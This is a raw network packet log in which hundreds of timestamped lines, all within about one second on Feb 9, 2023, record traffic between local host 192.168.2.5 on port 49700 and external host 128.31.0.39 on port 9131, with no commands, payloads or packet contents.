                      Feb 9, 2023 00:59:58.841042042 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.841087103 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917457104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917503119 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917541981 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917546034 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917578936 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917593002 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917615891 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917618036 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917637110 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917655945 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917666912 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917706966 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917709112 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917746067 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917752028 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917793036 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917804956 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917849064 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917855978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917897940 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917927980 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.917982101 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.917996883 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918034077 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918044090 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918071032 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918080091 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918118000 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918126106 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918163061 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918174028 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918199062 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918211937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918235064 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918246031 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918272972 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918282986 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918317080 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918512106 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918617010 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918627977 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918658018 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918679953 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918715954 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918721914 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918764114 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918775082 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918812037 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918818951 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918857098 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918869972 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.918921947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.918988943 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919039011 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919040918 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919085026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919097900 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919137955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919147968 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919183016 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919193983 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919231892 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919234991 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919266939 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919277906 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919302940 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919308901 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919341087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919392109 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919478893 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919501066 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919517994 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919589043 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919605017 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919646978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919714928 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919725895 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919766903 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919807911 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919820070 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919864893 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919903994 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919909954 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.919944048 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919984102 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.919987917 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920018911 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920058966 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920068026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920106888 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920151949 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920206070 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920249939 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920289040 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920291901 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920326948 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920373917 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920377016 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920393944 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920443058 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920450926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920490980 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920527935 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920531988 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920583963 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920619965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920625925 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920656919 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920692921 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920700073 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920741081 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920787096 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920793056 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920830965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920869112 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920876026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920927048 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.920972109 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.920995951 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921044111 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921081066 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921087980 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921117067 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921152115 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921159029 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921194077 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921210051 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921236992 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921247959 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921283960 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921303034 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921320915 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921360016 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921361923 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921415091 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921454906 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921459913 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921561956 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921600103 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921633959 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921693087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921746969 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921750069 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921782017 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921818972 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921833992 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921854973 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921899080 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921905041 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.921945095 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921982050 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.921993017 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922019005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922055006 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922060966 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922090054 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922126055 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922131062 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922164917 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922202110 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922210932 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922238111 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922276020 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922281981 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922312975 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922357082 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922389030 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922462940 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922509909 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922538042 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922576904 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922612906 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922616959 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922652960 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922750950 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922791958 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922831059 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922883034 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.922892094 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922930002 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922966003 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.922976017 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923003912 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923041105 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923049927 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923079014 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923114061 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923122883 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923151016 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923187017 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923197031 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923224926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923260927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923269987 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923297882 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923335075 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923351049 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923374891 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923413038 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923424959 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.923450947 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.923504114 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.934783936 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.934812069 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.935118914 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.935249090 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.935271025 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.935673952 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.938823938 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.938848019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.938874006 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.938895941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.938925982 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.938955069 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.940346003 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940370083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940391064 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940409899 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940429926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940432072 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.940449953 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.940480947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.940516949 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.942126989 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942159891 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942188978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942220926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942230940 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.942248106 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942266941 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.942270041 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942291021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942311049 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942312956 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.942331076 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942352057 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.942353010 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942373991 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.942389965 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.988317013 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.020828962 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.020865917 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.020886898 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.020912886 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.020929098 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.020941019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.020972013 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.021004915 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.021102905 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.023947001 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.023989916 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024015903 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024035931 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024058104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024085045 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024100065 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024111986 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024159908 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024486065 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024560928 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024602890 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024630070 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024657965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024696112 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024696112 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024717093 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024745941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024759054 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024770021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024794102 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024813890 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024817944 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024842978 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024853945 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024868965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024912119 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.024916887 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024945021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024981022 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.024986982 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025012016 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025038958 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025067091 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025075912 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025103092 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025120020 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025130033 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025172949 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025173903 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025202036 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025238037 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025253057 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025269985 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025311947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025316000 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025341034 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025382996 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025388002 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025409937 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025435925 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025458097 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025460005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025492907 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025501013 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025588036 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025614977 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025636911 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025639057 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025679111 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025703907 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025739908 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025765896 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025784969 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025789976 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025832891 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.025927067 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025959015 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.025985003 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026005030 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026010990 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026051998 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026089907 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026114941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026139021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026155949 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026169062 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026213884 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026216030 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026251078 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026283026 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026293993 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026326895 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026361942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026372910 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026387930 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026428938 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026434898 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026483059 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026510000 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026525021 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026547909 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026588917 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026608944 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026637077 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026679039 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026679993 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026727915 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026753902 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026781082 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026782990 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026817083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026827097 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026843071 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:59.026880026 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:59.026881933 CET913149700128.31.0.39192.168.2.5
